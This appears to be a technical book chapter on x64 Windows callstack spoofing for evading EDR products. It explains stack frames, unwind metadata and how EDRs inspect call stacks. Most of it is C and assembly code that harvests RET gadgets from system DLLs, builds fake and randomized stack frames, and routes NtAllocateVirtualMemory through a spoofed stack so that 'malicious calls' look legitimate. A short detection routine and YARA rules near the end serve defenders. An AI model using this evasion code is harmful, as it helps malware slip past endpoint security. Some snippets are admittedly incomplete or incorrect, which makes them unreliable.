Modern EDR systems have evolved beyond simple API hooking. They now examine the call stack at the moment of sensitive API invocations, asking a crucial question: "Where did this call originate?" When NtAllocateVirtualMemory is called directly from an unknown memory region rather than through the expected kernel32.dll → kernelbase.dll → ntdll.dll chain, alarm bells ring. Callstack spoofing addresses this by constructing fake stack frames that make malicious calls appear to originate from legitimate code paths.
Understanding callstack analysis and spoofing requires deep knowledge of x64 calling conventions, stack frame layout, and the Windows exception handling infrastructure. This chapter explores how security products analyze stacks, why certain patterns trigger detection, and the techniques used to construct convincing false call histories.
THE CALLSTACK ANALYSIS PROBLEM
==============================
SUSPICIOUS CALL (Detected):
┌─────────────────────────────────────────────────────────────────────┐
│ │
│ NtAllocateVirtualMemory called from: │
│ │
│ ┌───────────────────────────────────────────────────────────┐ │
│ │ Stack Frame 0: ntdll!NtAllocateVirtualMemory │ │
│ │ Return Address: 0x00000001400012AB ◄── UNKNOWN MODULE! │ │
│ ├───────────────────────────────────────────────────────────┤ │
│ │ Stack Frame 1: ??? (0x00000001400012AB) │ │
│ │ Return Address: 0x0000000140001000 ◄── RWX MEMORY! │ │
│ ├───────────────────────────────────────────────────────────┤ │
│ │ Stack Frame 2: ??? │ │
│ │ Return Address: (invalid) ◄── BROKEN CHAIN! │ │
│ └───────────────────────────────────────────────────────────┘ │
│ │
│ EDR Analysis: "Direct syscall from unbacked memory" │
│ Result: BLOCKED / ALERT │
│ │
└─────────────────────────────────────────────────────────────────────┘
LEGITIMATE CALL (Expected):
┌─────────────────────────────────────────────────────────────────────┐
│ │
│ NtAllocateVirtualMemory called from: │
│ │
│ ┌───────────────────────────────────────────────────────────┐ │
│ │ Stack Frame 0: ntdll!NtAllocateVirtualMemory │ │
│ │ Return Address: kernelbase+0x1A2B3 ◄── Known offset │ │
│ ├───────────────────────────────────────────────────────────┤ │
│ │ Stack Frame 1: kernelbase!VirtualAllocEx │ │
│ │ Return Address: kernel32+0x5C7D2 ◄── Expected chain │ │
│ ├───────────────────────────────────────────────────────────┤ │
│ │ Stack Frame 2: kernel32!VirtualAlloc │ │
│ │ Return Address: app.exe+0x12AB ◄── Signed module │ │
│ └───────────────────────────────────────────────────────────┘ │
│ │
│ EDR Analysis: "Normal API call chain" │
│ Result: ALLOWED │
│ │
└─────────────────────────────────────────────────────────────────────┘
Before we can spoof call stacks, we must thoroughly understand how they're constructed. The x64 calling convention defines specific rules for parameter passing, stack alignment, and frame organization.
On 64-bit Windows, the first four integer/pointer arguments pass in registers (RCX, RDX, R8, R9), while additional arguments go on the stack. Every function call must maintain 16-byte stack alignment and provide a 32-byte "shadow space" for the callee to save register parameters.
x64 STACK FRAME ANATOMY
=======================
When Function A calls Function B:
High Memory
┌─────────────────────────────────────────────────────────────────┐
│ │
│ Function A's Stack Frame │
│ ├── A's local variables │
│ ├── A's saved non-volatile registers (if any) │
│ │ │
│ │ [Before CALL instruction, RSP points here] │
│ │ ▼ │
│ ├── Parameter 5 (if exists) [RSP+0x28] │
│ ├── Parameter 6 (if exists) [RSP+0x30] │
│ ├── ...more parameters... │
│ │ │
│ ├── Shadow space for RCX [RSP+0x08] │
│ ├── Shadow space for RDX [RSP+0x10] │
│ ├── Shadow space for R8 [RSP+0x18] │
│ ├── Shadow space for R9 [RSP+0x20] │
│ │
├─────────────────────────────────────────────────────────────────┤
│ CALL instruction executes → pushes return address │
├─────────────────────────────────────────────────────────────────┤
│ Return Address (8 bytes) [RSP] ◄── Key! │
├─────────────────────────────────────────────────────────────────┤
│ │
│ Function B's Stack Frame (after prologue) │
│ ├── Saved RBP (if frame pointer used) [RSP-0x08] │
│ ├── Saved non-volatile registers │
│ ├── Local variables │
│ ├── ... │
│ │
└─────────────────────────────────────────────────────────────────┘
Low Memory
Key Points:
• Return address is at [RSP] immediately after CALL
• Shadow space (32 bytes) is mandatory for every call
• Stack must be 16-byte aligned BEFORE the call
• RBP may or may not be used as frame pointer
Traditional stack walking relies on the frame pointer (RBP) forming a linked list. Each frame's saved RBP points to the previous frame's RBP, creating a chain that can be traversed to enumerate all callers.
// Manual stack walk using RBP chain
void WalkStackUsingRBP(void) {
PVOID pCurrentRbp;
PVOID pCurrentRip;
// Get current RBP
#ifdef _WIN64
pCurrentRbp = (PVOID)__readgsqword(0); // Not actually correct - for illustration
// Real code would use assembly or RtlCaptureContext
#endif
printf("Stack Walk via RBP Chain:\n");
int nFrame = 0;
while (pCurrentRbp && nFrame < 20) {
// At each frame:
// [RBP] = saved previous RBP (next in chain)
// [RBP+8] = return address
PVOID pPrevRbp = *(PVOID*)pCurrentRbp;
PVOID pRetAddr = *(PVOID*)((PBYTE)pCurrentRbp + 8);
printf(" Frame %d: RBP=0x%p, Return=0x%p\n",
nFrame, pCurrentRbp, pRetAddr);
pCurrentRbp = pPrevRbp;
nFrame++;
}
}
However, many x64 functions omit the frame pointer (FPO - Frame Pointer Omission) to use RBP as a general-purpose register. These functions rely on metadata for stack walking instead.
Windows doesn't rely solely on frame pointers for stack walking. Instead, it uses rich metadata stored in the PE file that describes each function's stack usage.
Every non-leaf function in a PE file has a corresponding RUNTIME_FUNCTION entry in the .pdata section. This entry describes where the function starts, ends, and points to UNWIND_INFO describing how to restore the stack.
EXCEPTION HANDLING METADATA
===========================
.pdata Section (RUNTIME_FUNCTION array):
┌─────────────────────────────────────────────────────────────────┐
│ │
│ RUNTIME_FUNCTION Entry: │
│ ┌─────────────────────────────────────────────────────────┐ │
│ │ BeginAddress (DWORD) ─► RVA of function start │ │
│ │ EndAddress (DWORD) ─► RVA of function end │ │
│ │ UnwindData (DWORD) ─► RVA of UNWIND_INFO │ │
│ └─────────────────────────────────────────────────────────┘ │
│ │
│ Example: │
│ { 0x00001000, 0x00001500, 0x00008000 } │
│ │
│ Means: Function at RVA 0x1000-0x1500, unwind at 0x8000 │
│ │
└─────────────────────────────────────────────────────────────────┘
UNWIND_INFO Structure:
┌─────────────────────────────────────────────────────────────────┐
│ │
│ ┌─────────────────────────────────────────────────────────┐ │
│ │ Version (3 bits) │ Usually 1 │ │
│ │ Flags (5 bits) │ UNW_FLAG_* values │ │
│ │ SizeOfProlog (byte) │ Size of function prologue │ │
│ │ CountOfCodes (byte) │ Number of unwind codes │ │
│ │ FrameRegister (4 bits) │ Which register is frame ptr │ │
│ │ FrameOffset (4 bits) │ Offset from RSP to frame │ │
│ │ UnwindCode[n] │ Array of unwind operations │ │
│ └─────────────────────────────────────────────────────────┘ │
│ │
│ Unwind codes describe stack operations: │
│ • UWOP_PUSH_NONVOL - Register was pushed │
│ • UWOP_ALLOC_LARGE - Large stack allocation │
│ • UWOP_ALLOC_SMALL - Small stack allocation │
│ • UWOP_SET_FPREG - Frame pointer established │
│ • etc. │
│ │
└─────────────────────────────────────────────────────────────────┘
Windows uses RtlVirtualUnwind to walk the stack one frame at a time. Given a context (register state) and the current instruction pointer, it finds the RUNTIME_FUNCTION, decodes the UNWIND_INFO, and computes the previous frame's state.
#include <windows.h>
// Demonstrate RtlVirtualUnwind usage
void WalkStackProperly(PCONTEXT pContext) {
CONTEXT ctx = *pContext;
KNONVOLATILE_CONTEXT_POINTERS nvCtx = { 0 };
printf("Stack Walk via RtlVirtualUnwind:\n");
int nFrame = 0;
while (ctx.Rip && nFrame < 20) {
// Lookup RUNTIME_FUNCTION for current RIP
DWORD64 dwImageBase = 0;
PRUNTIME_FUNCTION pRtFunc = RtlLookupFunctionEntry(
ctx.Rip,
&dwImageBase,
NULL // Dynamic function table
);
printf(" Frame %d: RIP=0x%llX", nFrame, ctx.Rip);
if (pRtFunc) {
// Has unwind info - use it
PVOID pHandlerData = NULL;
DWORD64 dwEstablisherFrame = 0;
RtlVirtualUnwind(
UNW_FLAG_NHANDLER,
dwImageBase,
ctx.Rip,
pRtFunc,
&ctx,
&pHandlerData,
&dwEstablisherFrame,
&nvCtx
);
printf(" (has RUNTIME_FUNCTION)\n");
}
else {
// Leaf function - return address is at [RSP]
ctx.Rip = *(PDWORD64)ctx.Rsp;
ctx.Rsp += 8;
printf(" (leaf function)\n");
}
nFrame++;
}
}
Understanding what EDRs look for helps us understand what we need to fake. Modern EDRs perform sophisticated stack analysis during sensitive operations.
EDR STACK ANALYSIS CHECKLIST
============================
For each stack frame, EDRs typically verify:
1. MODULE BACKING
┌────────────────────────────────────────────────────────────┐
│ • Is the return address within a loaded module? │
│ • Is that module signed? Trusted? │
│ • Is it mapped from disk (not private memory)? │
└────────────────────────────────────────────────────────────┘
Detection: Direct syscall from shellcode → ALERT
2. VALID CHAIN
┌────────────────────────────────────────────────────────────┐
│ • Does the RBP chain form a valid linked list? │
│ • Are all RBP values within the thread's stack? │
│ • Does the chain reach a reasonable end? │
└────────────────────────────────────────────────────────────┘
Detection: Broken chain or circular reference → ALERT
3. RUNTIME_FUNCTION ENTRIES
┌────────────────────────────────────────────────────────────┐
│ • Does each return address have a RUNTIME_FUNCTION? │
│ • Exception: Leaf functions (small, no stack alloc) │
│ • Exception: Dynamic code (JIT, trampolines) │
└────────────────────────────────────────────────────────────┘
Detection: Return to address without metadata → SUSPICIOUS
4. RETURN ADDRESS VALIDITY
┌────────────────────────────────────────────────────────────┐
│ • Is the return address right after a CALL instruction? │
│ • Does it make sense given the function boundaries? │
│ • Is it inside a known function? │
└────────────────────────────────────────────────────────────┘
Detection: Return to middle of instruction → ALERT
5. EXPECTED CALL PATTERNS
┌────────────────────────────────────────────────────────────┐
│ • Does the chain match known API patterns? │
│ • e.g., NtAllocateVirtualMemory should be called via │
│ VirtualAlloc → VirtualAllocEx → NtAllocateVirtual... │
└────────────────────────────────────────────────────────────┘
Detection: Unusual caller for syscall → SUSPICIOUS
EDRs typically capture stacks in kernel callbacks or through instrumentation. They may use:
// Kernel-mode stack capture (simplified concept)
VOID OnSyscallEntry(DWORD dwSyscallNumber) {
KTRAP_FRAME* pTrapFrame = GetCurrentTrapFrame();
// Capture user-mode stack from RSP
PVOID pUserStack[32];
ULONG ulCaptured;
__try {
ProbeForRead((PVOID)pTrapFrame->Rsp, 256, 1);
for (int i = 0; i < 32; i++) {
pUserStack[i] = *(PVOID*)(pTrapFrame->Rsp + i * 8);
}
}
__except(EXCEPTION_EXECUTE_HANDLER) {
// Invalid stack access
}
// Analyze captured frames
AnalyzeStackFrames(pUserStack, 32, dwSyscallNumber);
}
The simplest spoofing technique replaces the return address with an address inside a legitimate module. When the EDR examines the stack, it sees a return to known code rather than our malicious module.
A "gadget" is a small code sequence we can use as a fake return target. The simplest is just a RET instruction (0xC3). When execution "returns" to this gadget, it immediately returns again, continuing the chain.
#include <windows.h>
// Find a RET instruction in a legitimate module
PVOID FindRetGadget(HMODULE hModule) {
PBYTE pBase = (PBYTE)hModule;
// Get module bounds from PE headers
PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)pBase;
PIMAGE_NT_HEADERS pNt = (PIMAGE_NT_HEADERS)(pBase + pDos->e_lfanew);
SIZE_T sSize = pNt->OptionalHeader.SizeOfImage;
// Search for RET (0xC3) instruction
// Search in .text section for executable code
PIMAGE_SECTION_HEADER pSection = IMAGE_FIRST_SECTION(pNt);
for (WORD i = 0; i < pNt->FileHeader.NumberOfSections; i++) {
if (pSection[i].Characteristics & IMAGE_SCN_CNT_CODE) {
PBYTE pCode = pBase + pSection[i].VirtualAddress;
SIZE_T sCodeSize = pSection[i].Misc.VirtualSize;
for (SIZE_T j = 0; j < sCodeSize; j++) {
if (pCode[j] == 0xC3) {
return &pCode[j];
}
}
}
}
return NULL;
}
// Find "pop rbp; ret" gadget (0x5D 0xC3)
// Useful for maintaining RBP chain
PVOID FindPopRbpRetGadget(HMODULE hModule) {
PBYTE pBase = (PBYTE)hModule;
PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)pBase;
PIMAGE_NT_HEADERS pNt = (PIMAGE_NT_HEADERS)(pBase + pDos->e_lfanew);
PIMAGE_SECTION_HEADER pSection = IMAGE_FIRST_SECTION(pNt);
for (WORD i = 0; i < pNt->FileHeader.NumberOfSections; i++) {
if (pSection[i].Characteristics & IMAGE_SCN_CNT_CODE) {
PBYTE pCode = pBase + pSection[i].VirtualAddress;
SIZE_T sCodeSize = pSection[i].Misc.VirtualSize;
for (SIZE_T j = 0; j < sCodeSize - 1; j++) {
if (pCode[j] == 0x5D && pCode[j + 1] == 0xC3) {
return &pCode[j];
}
}
}
}
return NULL;
}
For more convincing spoofing, we find addresses that look like real return addresses—locations immediately after CALL instructions within legitimate functions.
#include <windows.h>
typedef struct _CALL_SITE_INFO {
PVOID pAddress; // Address right after CALL instruction
PVOID pFunctionStart; // Start of containing function
SIZE_T sOffset; // Offset within function
} CALL_SITE_INFO, *PCALL_SITE_INFO;
// Find addresses that follow CALL instructions
// These look like legitimate return addresses
DWORD FindCallSites(
HMODULE hModule,
PCALL_SITE_INFO pSites,
DWORD dwMaxSites
) {
PBYTE pBase = (PBYTE)hModule;
PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)pBase;
PIMAGE_NT_HEADERS pNt = (PIMAGE_NT_HEADERS)(pBase + pDos->e_lfanew);
// Find .text section
PIMAGE_SECTION_HEADER pSection = IMAGE_FIRST_SECTION(pNt);
PBYTE pText = NULL;
SIZE_T sTextSize = 0;
for (WORD i = 0; i < pNt->FileHeader.NumberOfSections; i++) {
if (strcmp((char*)pSection[i].Name, ".text") == 0) {
pText = pBase + pSection[i].VirtualAddress;
sTextSize = pSection[i].Misc.VirtualSize;
break;
}
}
if (!pText) return 0;
DWORD dwFound = 0;
// Search for CALL instructions
for (SIZE_T i = 0; i < sTextSize - 5 && dwFound < dwMaxSites; i++) {
// E8 xx xx xx xx = CALL rel32 (relative near call)
if (pText[i] == 0xE8) {
// The byte after CALL is where execution returns
PVOID pReturnSite = &pText[i + 5];
pSites[dwFound].pAddress = pReturnSite;
pSites[dwFound].sOffset = i + 5;
dwFound++;
}
// FF 15 xx xx xx xx = CALL [rip+rel32] (indirect call via memory)
else if (pText[i] == 0xFF && pText[i + 1] == 0x15) {
PVOID pReturnSite = &pText[i + 6];
pSites[dwFound].pAddress = pReturnSite;
pSites[dwFound].sOffset = i + 6;
dwFound++;
}
}
return dwFound;
}
More sophisticated spoofing builds complete fake stack frames that maintain proper RBP chains and shadow space. This survives deeper stack analysis.
#include <windows.h>
// A synthetic stack frame
typedef struct _SYNTHETIC_FRAME {
PVOID pSavedRbp; // Points to next frame's saved RBP
PVOID pReturnAddress; // Fake return address in legitimate module
BYTE bShadowSpace[32];// Shadow space (required by calling convention)
} SYNTHETIC_FRAME, *PSYNTHETIC_FRAME;
// Collection of frames forming a fake call stack
typedef struct _SPOOF_STACK {
BYTE bMemory[4096]; // Memory for synthetic frames
PVOID pStackTop; // Top of our synthetic stack
DWORD dwFrameCount; // Number of frames
PVOID pRealReturnAddress; // Where to actually return
} SPOOF_STACK, *PSPOOF_STACK;
#include <windows.h>
typedef struct _GADGET_COLLECTION {
PVOID pGadgets[32];
char szModules[32][64];
DWORD dwCount;
} GADGET_COLLECTION, *PGADGET_COLLECTION;
// Collect gadgets from multiple trusted modules
BOOL CollectGadgets(PGADGET_COLLECTION pColl) {
const wchar_t* wszModules[] = {
L"kernel32.dll",
L"kernelbase.dll",
L"ntdll.dll",
L"user32.dll",
L"advapi32.dll",
NULL
};
pColl->dwCount = 0;
for (int i = 0; wszModules[i] && pColl->dwCount < 32; i++) {
HMODULE hMod = GetModuleHandleW(wszModules[i]);
if (!hMod) hMod = LoadLibraryW(wszModules[i]);
if (!hMod) continue;
PVOID pGadget = FindRetGadget(hMod);
if (pGadget) {
pColl->pGadgets[pColl->dwCount] = pGadget;
WideCharToMultiByte(CP_ACP, 0, wszModules[i], -1,
pColl->szModules[pColl->dwCount], 64, NULL, NULL);
pColl->dwCount++;
}
}
return pColl->dwCount > 0;
}
// Build a synthetic stack with specified depth
PVOID BuildSyntheticStack(
PSPOOF_STACK pStack,
PGADGET_COLLECTION pGadgets,
PVOID pRealReturn,
DWORD dwFrameDepth
) {
// Start at top of our stack memory
PBYTE pCurrent = pStack->bMemory + sizeof(pStack->bMemory);
// Reserve space and align to 16 bytes
pCurrent -= 256;
pCurrent = (PBYTE)((ULONG_PTR)pCurrent & ~0xF);
// Build frames from bottom (oldest) to top (newest)
PVOID pNextRbp = NULL;
for (DWORD i = 0; i < dwFrameDepth; i++) {
// Select a gadget (vary by frame for realism)
PVOID pGadget = pGadgets->pGadgets[i % pGadgets->dwCount];
// Reserve shadow space
pCurrent -= 32;
// Return address
pCurrent -= 8;
*(PVOID*)pCurrent = (i == 0) ? pRealReturn : pGadget;
// Saved RBP (points to next frame's RBP location)
pCurrent -= 8;
*(PVOID*)pCurrent = pNextRbp;
pNextRbp = pCurrent; // This frame's RBP will be previous frame's saved RBP
}
pStack->pStackTop = pCurrent;
pStack->pRealReturnAddress = pRealReturn;
pStack->dwFrameCount = dwFrameDepth;
return pCurrent;
}
Actually using the spoofed stack requires assembly code to switch stacks and make the call. C code alone cannot manipulate RSP and RBP safely during a function call.
; spoofcall.asm - x64 MASM assembly for stack spoofing
.code
; GetCurrentReturnAddress - get the return address of our caller
; Returns: RAX = return address
GetReturnAddress PROC
mov rax, [rsp] ; Return address is at [RSP]
ret
GetReturnAddress ENDP
; SpoofedCall - Make a call with a spoofed stack
;
; Parameters:
; RCX = pSpoofStack - Pointer to SPOOF_STACK structure
; RDX = pTargetFunction - Function to call
; R8 = pArg1 - First argument to target
; R9 = pArg2 - Second argument to target
; [RSP+0x28] = pArg3 - Third argument
; [RSP+0x30] = pArg4 - Fourth argument
;
; The SPOOF_STACK structure:
; +0x000: Memory buffer for synthetic stack
; +0x1000: pStackTop (PVOID)
; +0x1008: dwFrameCount (DWORD)
; +0x1010: pRealReturnAddress (PVOID)
SPOOF_STACK_TOP_OFFSET EQU 1000h
SPOOF_REAL_RETURN_OFFSET EQU 1010h
SpoofedCall PROC
; Save non-volatile registers
push rbx
push rsi
push rdi
push rbp
push r12
push r13
push r14
push r15
; Save parameters
mov r12, rcx ; pSpoofStack
mov r13, rdx ; pTargetFunction
mov r14, r8 ; pArg1
mov r15, r9 ; pArg2
; Save original stack
mov rbx, rsp
mov rsi, rbp
; Load spoofed stack pointer
mov rsp, [r12 + SPOOF_STACK_TOP_OFFSET]
; Set RBP to point to first synthetic frame
mov rbp, rsp
; Allocate shadow space for target call
sub rsp, 20h
; Setup arguments for target function
mov rcx, r14 ; Arg1
mov rdx, r15 ; Arg2
mov r8, [rbx + 68h] ; Arg3 (from original stack, accounting for pushes)
mov r9, [rbx + 70h] ; Arg4
; Call target function
; EDR will see our spoofed stack when it examines!
call r13
; Save return value
mov r12, rax
; Restore original stack
mov rsp, rbx
mov rbp, rsi
; Return value
mov rax, r12
; Restore non-volatile registers
pop r15
pop r14
pop r13
pop r12
pop rbp
pop rdi
pop rsi
pop rbx
ret
SpoofedCall ENDP
END
#include <windows.h>
// Assembly function declaration
extern NTSTATUS SpoofedCall(
PSPOOF_STACK pSpoofStack,
PVOID pTargetFunction,
PVOID pArg1,
PVOID pArg2,
PVOID pArg3,
PVOID pArg4
);
// High-level wrapper for common APIs
NTSTATUS SpoofedNtAllocateVirtualMemory(
PSPOOF_STACK pStack,
PGADGET_COLLECTION pGadgets,
HANDLE ProcessHandle,
PVOID* BaseAddress,
ULONG_PTR ZeroBits,
PSIZE_T RegionSize,
ULONG AllocationType,
ULONG Protect
) {
// Get the target function
typedef NTSTATUS (NTAPI* fnNtAllocateVirtualMemory)(
HANDLE, PVOID*, ULONG_PTR, PSIZE_T, ULONG, ULONG
);
fnNtAllocateVirtualMemory pNtAlloc =
(fnNtAllocateVirtualMemory)GetProcAddress(
GetModuleHandleW(L"ntdll.dll"),
"NtAllocateVirtualMemory"
);
// Build spoofed stack with 5 frames
BuildSyntheticStack(pStack, pGadgets, _ReturnAddress(), 5);
// Make the call with spoofed stack
// Note: Would need to adjust assembly for 6 parameters
return SpoofedCall(
pStack,
pNtAlloc,
(PVOID)ProcessHandle,
(PVOID)BaseAddress,
(PVOID)ZeroBits,
(PVOID)RegionSize
// AllocationType and Protect need different handling
);
}
Static spoofed stacks create detectable patterns. Randomizing frame count and gadget selection helps evade signature-based detection.
#include <windows.h>
// Generate pseudo-random numbers without suspicious RNG calls
DWORD GetPseudoRandom(void) {
LARGE_INTEGER li;
QueryPerformanceCounter(&li);
return (DWORD)(li.QuadPart ^ (li.QuadPart >> 17));
}
// Build randomized synthetic stack
PVOID BuildRandomizedStack(
PSPOOF_STACK pStack,
PGADGET_COLLECTION pGadgets,
PVOID pRealReturn
) {
// Random frame count between 4 and 10
DWORD dwRandom = GetPseudoRandom();
DWORD dwFrameCount = 4 + (dwRandom % 7);
// Build with random frame count
PBYTE pCurrent = pStack->bMemory + sizeof(pStack->bMemory);
pCurrent -= 256;
pCurrent = (PBYTE)((ULONG_PTR)pCurrent & ~0xF);
PVOID pNextRbp = NULL;
for (DWORD i = 0; i < dwFrameCount; i++) {
// Random gadget selection
DWORD dwGadgetIdx = (GetPseudoRandom() + i) % pGadgets->dwCount;
PVOID pGadget = pGadgets->pGadgets[dwGadgetIdx];
// Random shadow space padding (still 32+ bytes)
DWORD dwPadding = 32 + (GetPseudoRandom() % 32);
pCurrent -= dwPadding;
// Return address
pCurrent -= 8;
*(PVOID*)pCurrent = (i == 0) ? pRealReturn : pGadget;
// Saved RBP
pCurrent -= 8;
*(PVOID*)pCurrent = pNextRbp;
pNextRbp = pCurrent;
}
pStack->pStackTop = pCurrent;
return pCurrent;
}
The most sophisticated spoofing mimics the exact call chain that legitimate API calls produce:
#include <windows.h>
// Known API call chain patterns
typedef struct _CALL_CHAIN {
const char* szApiName;
const wchar_t* wszModuleChain[8]; // Module names in order
} CALL_CHAIN, *PCALL_CHAIN;
// Example known patterns
CALL_CHAIN g_KnownChains[] = {
{
"NtAllocateVirtualMemory",
{ L"ntdll.dll", L"kernelbase.dll", L"kernel32.dll", NULL }
},
{
"NtWriteVirtualMemory",
{ L"ntdll.dll", L"kernelbase.dll", L"kernel32.dll", NULL }
},
{
"NtCreateThreadEx",
{ L"ntdll.dll", L"kernelbase.dll", L"kernel32.dll", NULL }
},
{ NULL, { NULL } }
};
// Build stack matching a specific API's expected chain
BOOL BuildRealisticChain(
PSPOOF_STACK pStack,
const char* szTargetApi,
PVOID pRealReturn
) {
// Find the expected chain
PCALL_CHAIN pChain = NULL;
for (int i = 0; g_KnownChains[i].szApiName; i++) {
if (strcmp(g_KnownChains[i].szApiName, szTargetApi) == 0) {
pChain = &g_KnownChains[i];
break;
}
}
if (!pChain) return FALSE;
// Build stack with gadgets from the correct modules in order
PBYTE pCurrent = pStack->bMemory + sizeof(pStack->bMemory);
pCurrent -= 256;
pCurrent = (PBYTE)((ULONG_PTR)pCurrent & ~0xF);
PVOID pNextRbp = NULL;
BOOL bFirstFrame = TRUE;
for (int i = 0; pChain->wszModuleChain[i]; i++) {
HMODULE hMod = GetModuleHandleW(pChain->wszModuleChain[i]);
if (!hMod) continue;
PVOID pGadget = FindRetGadget(hMod);
if (!pGadget) continue;
// Build frame
pCurrent -= 32; // Shadow space
pCurrent -= 8; // Return address
*(PVOID*)pCurrent = bFirstFrame ? pRealReturn : pGadget;
bFirstFrame = FALSE;
pCurrent -= 8; // Saved RBP
*(PVOID*)pCurrent = pNextRbp;
pNextRbp = pCurrent;
}
pStack->pStackTop = pCurrent;
return TRUE;
}
Understanding detection helps both defenders and offensive operators. Here are the key indicators of stack spoofing:
STACK SPOOFING DETECTION CHECKLIST
==================================
┌────────────────────────────────────────────────────────────────────┐
│ INDICATOR │ DETECTION METHOD │
├──────────────────────────────────┼────────────────────────────────┤
│ RSP outside thread stack limits │ Compare RSP to TEB stack info │
│ │ GetCurrentThreadStackLimits() │
├──────────────────────────────────┼────────────────────────────────┤
│ All returns to RET gadgets │ Disassemble at each return │
│ │ address; check if just "ret" │
├──────────────────────────────────┼────────────────────────────────┤
│ Return not after CALL │ Check byte before return addr │
│ │ for CALL opcode (E8, FF) │
├──────────────────────────────────┼────────────────────────────────┤
│ Missing RUNTIME_FUNCTION │ RtlLookupFunctionEntry returns │
│ │ NULL for return addresses │
├──────────────────────────────────┼────────────────────────────────┤
│ Impossible call chain │ Cross-reference known API │
│ │ calling patterns │
├──────────────────────────────────┼────────────────────────────────┤
│ Uniform frame sizes │ Measure distance between saved │
│ │ RBP values; too regular? │
└────────────────────────────────────────────────────────────────────┘
#include <windows.h>
// Check if a stack appears to be spoofed
BOOL DetectStackSpoof(HANDLE hThread) {
CONTEXT ctx = { 0 };
ctx.ContextFlags = CONTEXT_FULL;
if (!GetThreadContext(hThread, &ctx)) {
return FALSE;
}
// Get legitimate stack boundaries
NT_TIB* pTib = (NT_TIB*)NtCurrentTeb();
PVOID pStackBase = pTib->StackBase;
PVOID pStackLimit = pTib->StackLimit;
// Check 1: RSP within stack limits
if (ctx.Rsp < (DWORD64)pStackLimit || ctx.Rsp > (DWORD64)pStackBase) {
printf("[!] RSP (0x%llX) outside stack bounds!\n", ctx.Rsp);
return TRUE; // Spoofed!
}
// Walk frames and analyze
DWORD64 dwRbp = ctx.Rbp;
int nGadgetReturns = 0;
int nFrames = 0;
while (dwRbp && nFrames < 20) {
// Check RBP in bounds
if (dwRbp < (DWORD64)pStackLimit || dwRbp > (DWORD64)pStackBase) {
printf("[!] Frame %d: RBP outside stack\n", nFrames);
return TRUE;
}
DWORD64 dwRetAddr = *(DWORD64*)(dwRbp + 8);
// Check for RUNTIME_FUNCTION
DWORD64 dwImageBase;
PRUNTIME_FUNCTION pRtFunc = RtlLookupFunctionEntry(
dwRetAddr, &dwImageBase, NULL);
if (!pRtFunc) {
printf("[?] Frame %d: No RUNTIME_FUNCTION (may be leaf)\n", nFrames);
}
// Check if return address is just a RET gadget
__try {
if (*(BYTE*)dwRetAddr == 0xC3) {
nGadgetReturns++;
}
}
__except(EXCEPTION_EXECUTE_HANDLER) {}
dwRbp = *(DWORD64*)dwRbp;
nFrames++;
}
// Heuristic: Multiple returns to bare RET is suspicious
if (nGadgetReturns > 2) {
printf("[!] %d frames return to RET gadgets!\n", nGadgetReturns);
return TRUE;
}
return FALSE;
}
rule Callstack_Spoof_Gadget_Search {
meta:
description = "Detects code that searches for RET gadgets"
strings:
// Searching for 0xC3 (RET) byte
$gadget_search1 = { 80 ?? C3 } // cmp [reg], 0xC3
$gadget_search2 = { 3C C3 } // cmp al, 0xC3
// Searching for 0x5D 0xC3 (pop rbp; ret)
$gadget_search3 = { 66 81 ?? 5D C3 }
// RtlLookupFunctionEntry for validation bypass
$unwind_api = "RtlLookupFunctionEntry" ascii
// Stack limit checking (possible evasion)
$stack_check = "NtQueryInformationThread" ascii
condition:
(any of ($gadget_search*)) or
($unwind_api and any of ($gadget_search*))
}
rule Suspicious_Stack_Manipulation {
meta:
description = "Detects unusual stack pointer manipulation"
strings:
// Direct RSP assignment (stack switching)
$rsp_mov1 = { 48 8B E? } // mov rsp, reg
$rsp_mov2 = { 48 89 ?? E4 } // mov rsp, [reg]
// RBP chain manipulation
$rbp_chain = { 48 89 ?? 48 89 ?? } // Two consecutive mov involving rbp
// Get return address pattern
$ret_addr = { 48 8B 04 24 } // mov rax, [rsp]
condition:
2 of them
}
Callstack spoofing is a sophisticated technique that exploits the gap between how EDRs analyze execution context and how that context can be artificially constructed.
TECHNIQUE EFFECTIVENESS SUMMARY
===============================
┌────────────────────────────────┬────────────┬────────────┬─────────────┐
│ Technique │ Complexity │ Stealth │ Robustness │
├────────────────────────────────┼────────────┼────────────┼─────────────┤
│ Simple return addr replacement │ Low │ Low │ Low │
│ RET gadget chains │ Medium │ Medium │ Medium │
│ Full synthetic frames │ High │ High │ High │
│ Realistic call chains │ Very High │ Very High │ High │
│ + Randomization │ Very High │ Very High │ Very High │
└────────────────────────────────┴────────────┴────────────┴─────────────┘
Best Practices: